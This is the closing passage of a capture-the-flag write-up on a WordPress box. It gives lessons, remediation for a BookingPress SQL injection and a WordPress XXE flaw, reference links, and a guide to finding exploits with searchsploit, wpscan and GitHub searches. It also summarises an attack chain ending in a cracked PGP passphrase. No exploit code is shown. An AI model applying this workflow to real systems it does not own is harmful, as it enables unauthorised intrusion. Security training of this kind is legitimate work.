│ - Most online resources showed incorrect payload generation │
│ │
│ [3] Configuration File Security │
│ - wp-config.php often contains database and FTP credentials │
│ - Sensitive files should never be web-accessible │
│ │
│ [4] Credential Chain │
│ - Each credential led to the next system access │
│ - FTP → SSH → PGP → Root demonstrates lateral movement │
│ │
│ [5] Password Manager Security │
│ - Weak passphrases compromise all stored credentials │
│ - "blink182" is a terrible passphrase for protecting root access │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────┐
│ REMEDIATION │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] BookingPress SQL Injection (CVE-2022-0739) │
│ - Issue: Unauthenticated SQL injection in BookingPress < 1.0.11 │
│ - Fix: Update BookingPress to >= 1.0.11 immediately │
│ │
│ [2] WordPress XXE (CVE-2021-29447) │
│ - Issue: XXE via malicious WAV files in WordPress 5.6-5.7 with PHP 8 │
│ - Fix: Update WordPress to >= 5.7.1, restrict file uploads │
│ │
│ [3] Hardcoded Credentials │
│ - Issue: Credentials stored in plaintext in configuration files │
│ - Fix: Use environment variables, secrets management, rotate passwords │
│ │
│ [4] Weak PGP Passphrase │
│ - Issue: Password manager protected by weak passphrase "blink182" │
│ - Fix: Use strong, random passphrases (20+ characters minimum) │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
Vulnerabilities:
- CVE-2021-29447 - WordPress XXE (WPScan Database)
- CVE-2021-29447 - WordPress XXE (SonarSource Analysis)
- CVE-2022-0739 - BookingPress SQLi (WPScan Database)
- WordPress 5.6.2 Vulnerability Lookup
- WordPress XXE PoC Video
Tools:
- WPScan - WordPress Security Scanner
- WPScan Vulnerability Database
- Wappalyzer - Technology Profiler
- SQLMap
- John the Ripper
- Passpie Password Manager
Techniques:
┌──────────────────────────────────────────────────────────────────────────────────┐
│ HOW TO FIND EXPLOITS & POC SCRIPTS │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ [1] IDENTIFY VERSION │
│ ▸ Use nmap, wappalyzer, banner grabbing to find service versions │
│ ▸ Check /readme.html, /license.txt for CMS versions │
│ ▸ Example: WordPress 5.6.2, BookingPress < 1.0.11 │
│ │
│ [2] SEARCH EXPLOIT-DB / SEARCHSPLOIT │
│ ▸ searchsploit wordpress 5.6 │
│ ▸ searchsploit bookingpress │
│ ▸ searchsploit proftpd │
│ ▸ https://www.exploit-db.com/ │
│ │
│ [3] SEARCH CVE DATABASES │
│ ▸ https://nvd.nist.gov/ (NIST National Vulnerability Database) │
│ ▸ https://cve.mitre.org/ (CVE List) │
│ ▸ https://cvedetails.com/ (CVE Details with PoC links) │
│ ▸ Search: "CVE-2022-0739", "CVE-2021-29447" │
│ │
│ [4] GITHUB POC REPOSITORIES │
│ ▸ Search: site:github.com CVE-2022-0739 │
│ ▸ https://github.com/nomi-sec/PoC-in-GitHub (PoC aggregator) │
│ ▸ https://github.com/trickest/cve (CVE PoC collection) │
│ │
│ [5] WORDPRESS-SPECIFIC RESOURCES │
│ ▸ https://wpscan.com/ (WPScan Vulnerability Database) │
│ ▸ https://wpscan.com/wordpress/562 (WP 5.6.2 vulnerabilities) │
│ ▸ wpscan --url <target> --api-token <token> -e vp,vt │
│ │
│ [6] SECURITY RESEARCH RESOURCES │
│ ▸ https://book.hacktricks.xyz/ (HackTricks) │
│ ▸ https://github.com/swisskyrepo/PayloadsAllTheThings │
│ ▸ https://pentestmonkey.net/ │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
┌──────────────────────────────────────────────────────────────────────────────────┐
│ VULNERABILITIES IN THIS BOX - SEARCH QUERIES │
├──────────────────────────────────────────────────────────────────────────────────┤
│ │
│ CVE-2022-0739 (BookingPress SQLi) │
│ ▸ searchsploit bookingpress │
│ ▸ site:github.com CVE-2022-0739 exploit │
│ ▸ https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357 │
│ │
│ CVE-2021-29447 (WordPress XXE) │
│ ▸ site:github.com CVE-2021-29447 poc wav │
│ ▸ https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5 │
│ ▸ "wordpress xxe wav file" php 8 │
│ │
│ Passpie PGP Cracking │
│ ▸ gpg2john + john the ripper │
│ ▸ "passpie password manager crack" │
│ │
└──────────────────────────────────────────────────────────────────────────────────┘
╔══════════════════════════════════════════════════════════════════════════════════════╗
║ ║
║ ░█▀▀░█░█░█▀▀░▀█▀░█▀▀░█▄█░░░█▀▀░█▀█░█▄█░█▀█░█▀▄░█▀█░█▄█░▀█▀░█▀▀░█▀▀░█▀▄ ║
║ ░▀▀█░░█░░▀▀█░░█░░█▀▀░█░█░░░█░░░█░█░█░█░█▀▀░█▀▄░█░█░█░█░░█░░▀▀█░█▀▀░█░█ ║
║ ░▀▀▀░░▀░░▀▀▀░░▀░░▀▀▀░▀░▀░░░▀▀▀░▀▀▀░▀░▀░▀░░░▀░▀░▀▀▀░▀░▀░▀▀▀░▀▀▀░▀▀▀░▀▀░ ║
║ ║
║ WRITEUP AUTHOR: Netrunner ║
║ COMPLETION DATE: 2026-01-14 ║
║ ATTACK CHAIN: SQLi > XXE > FTP > SSH > PGP Crack > Root ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════╝